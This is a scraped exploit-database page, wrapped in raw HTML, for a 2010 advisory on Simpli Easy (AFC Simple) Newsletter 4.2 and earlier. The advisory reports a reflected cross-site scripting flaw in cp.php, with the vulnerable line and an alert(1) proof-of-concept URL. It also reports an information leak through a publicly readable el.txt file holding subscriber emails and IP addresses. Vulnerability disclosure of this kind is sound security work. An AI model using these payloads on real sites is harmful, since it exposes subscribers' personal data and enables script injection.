Home / os / win7

[webapps / 0day] - Simpli Easy (AFC Simple) Newsletter <=

Posted on 30 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Simpli Easy (AFC Simple) Newsletter &lt;= 4.2 XSS/Information Leakage | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Simpli Easy (AFC Simple) Newsletter &lt;= 4.2 XSS/Information Leakage by p0deje in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>==================================================================== Simpli Easy (AFC Simple) Newsletter &lt;= 4.2 XSS / Information Leakage ==================================================================== Date: 30.10.2010 Author: p0deje | http://p0deje.blogspot.com Software Link: http://scubadivingcalculators.com/simpli-easy-newsletter.php Version: &lt;= 4.2 1. Cross-site Scripting Vulnerable code: cp.php ---------------- 6: &lt;form name=&quot;txtlist&quot; action=&quot;cp.php?do=&lt;?=$_GET[&#039;do&#039;]?&gt;&quot; method=&quot;post&quot;&gt; Proof-of-concept: http://www.example.com/cp.php?do=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt; 2. Information Leakage By default, application saves subscribed email addresses and correspondent IP addresses to plain text file el.txt Proof-of-concept: http://www.example.com/el.txt # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-30]</pre></body></html>

 

TOP